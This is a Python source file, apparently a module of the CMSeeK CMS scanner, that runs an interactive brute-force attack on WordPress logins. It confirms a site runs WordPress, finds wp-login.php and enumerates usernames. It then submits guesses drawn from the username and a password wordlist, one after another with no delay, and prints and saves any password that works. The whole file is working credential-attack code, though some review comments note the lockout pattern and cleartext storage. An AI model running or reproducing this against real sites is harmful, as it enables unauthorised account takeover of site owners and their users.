| import cmseekdb.basic as cmseek
import cmseekdb.sc as source # Contains function to detect cms from source code
import cmseekdb.header as header # Contains function to detect CMS from gathered http headers
import deepscans.wp.userenum as wp_user_enum
import multiprocessing ## Let's speed things up a lil bit (actually a hell lot faster) shell we?
from functools import partial ## needed somewhere :/
import sys
import cmseekdb.generator as generator
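def start():
    """Run the interactive WordPress login bruteforce module.

    Steps, as far as this function shows them:

    1. Prompt for a target URL and fetch its page source.
    2. Confirm the target is WordPress, first from the generator meta tag
       and, if that fails, from the page source.
    3. Fetch ``/wp-login.php`` and require a ``<form`` in the response.
    4. Take usernames from ``wp_user_enum.start``; if it finds none, ask the
       operator for one.
    5. For each username try, in order, the reversed username, the username
       itself and every non-empty line of ``wordlist/passwords.txt``,
       stopping at the first candidate that is accepted.

    Each "is quitting" error path calls ``cmseek.handle_quit()`` and returns.
    Nothing is returned; results are printed and passed to
    ``cmseek.savebrute``.

    What the target sees: one ``cmseek.wpbrutesrc`` call per candidate
    (presumably one login request each; the helper is not visible here),
    issued one after another with no delay in this function. For a single
    account that is a run of consecutive failed logins, which is the pattern
    login rate limiting and account lockout are built to stop.
    """
    cmseek.clearscreen()
    cmseek.banner("WordPress Bruteforce Module")
    url = cmseek.targetinp("")  # input('Enter Url: ')
    cmseek.info("Checking for WordPress")
    bsrc = cmseek.getsource(url, cmseek.randomua('thiscanbeanythingasfarasnowletitbewhatilovethemost'))
    # bsrc[0] is compared against '1' as the success flag, bsrc[1] is the body.
    if bsrc[0] != '1':
        cmseek.error("Could not get target source, CMSeek is quitting")
        cmseek.handle_quit()
        return

    ## Parse generator meta tag, then fall back to a source-code check
    generator_content = generator.parse(bsrc[1])[1]
    detected = generator.scan(generator_content)
    is_wordpress = detected[0] == '1' and detected[1] == 'wp'
    if not is_wordpress:
        detected = source.check(bsrc[1], url)
        is_wordpress = detected[0] == '1' and detected[1] == 'wp'
    if not is_wordpress:
        # The fetched body is not echoed here: it is content controlled by
        # the remote site, and writing it raw to the operator's terminal
        # would let it carry terminal control sequences.
        cmseek.error('Could not confirm WordPress... CMSeek is quitting')
        cmseek.handle_quit()
        return

    cmseek.success("WordPress Confirmed... Checking for WordPress login form")
    wploginsrc = cmseek.getsource(url + '/wp-login.php', cmseek.randomua('thatsprettygay'))
    if not (wploginsrc[0] == '1' and '<form' in wploginsrc[1]):
        cmseek.error("Couldn't find login form... CMSeeK is quitting")
        cmseek.handle_quit()
        return

    cmseek.success("Login form found.. Detecting Username For Bruteforce")
    uenum = wp_user_enum.start('wp', url, cmseek.randomua('r'), '0', bsrc[1])
    wpparamuser = uenum[1]  # list of enumerated usernames (compared to [] below)
    if wpparamuser == []:
        customuser = input("[~] CMSeek could not enumerate usernames, enter username if you know any: ")
        if customuser == "":
            # The message announces a quit, so quit as every other error
            # path does instead of falling through to an empty loop.
            cmseek.error("No user found, CMSeek is quitting")
            cmseek.handle_quit()
            return
        wpparamuser.append(customuser)

    # set() drops duplicate usernames so each account is tried once.
    for user in set(wpparamuser):
        passfound = False
        print('\n')
        cmseek.info("Bruteforcing User: " + cmseek.bold + user + cmseek.cln)
        with open("wordlist/passwords.txt", "r") as pwd_file:
            passwords = pwd_file.read().split('\n')
        # Username-derived guesses go first: reversed username, then username.
        passwords.insert(0, user)
        passwords.insert(0, user[::-1])
        for password in passwords:
            if password == '' or password == '\n':
                continue  # blank wordlist lines are not candidates
            sys.stdout.write('[*] Testing Password: ')
            sys.stdout.write('%s\r\r' % password)
            sys.stdout.flush()
            cursrc = cmseek.wpbrutesrc(url, user, password)
            # NOTE(review): what cursrc[3] holds is not visible here
            # (presumably the post-login URL); success is inferred only from
            # the substring 'wp-admin' in it, so confirm this cannot match on
            # a failed login.
            if 'wp-admin' in str(cursrc[3]):
                cmseek.success('Password found!')
                print(" |\n |--[username]--> " + cmseek.bold + user + cmseek.cln + "\n |\n |--[password]--> " + cmseek.bold + password + cmseek.cln + "\n |")
                cmseek.success('Enjoy The Hunt!')
                # NOTE(review): the recovered password reaches the terminal
                # and cmseek.savebrute in cleartext; how savebrute stores it
                # is not visible here, so confirm the result file is
                # access-restricted.
                cmseek.savebrute(url,url + '/wp-login.php',user,password)
                passfound = True
                break
        if not passfound:
            cmseek.error('\n\nCould Not find Password!')
        print('\n\n')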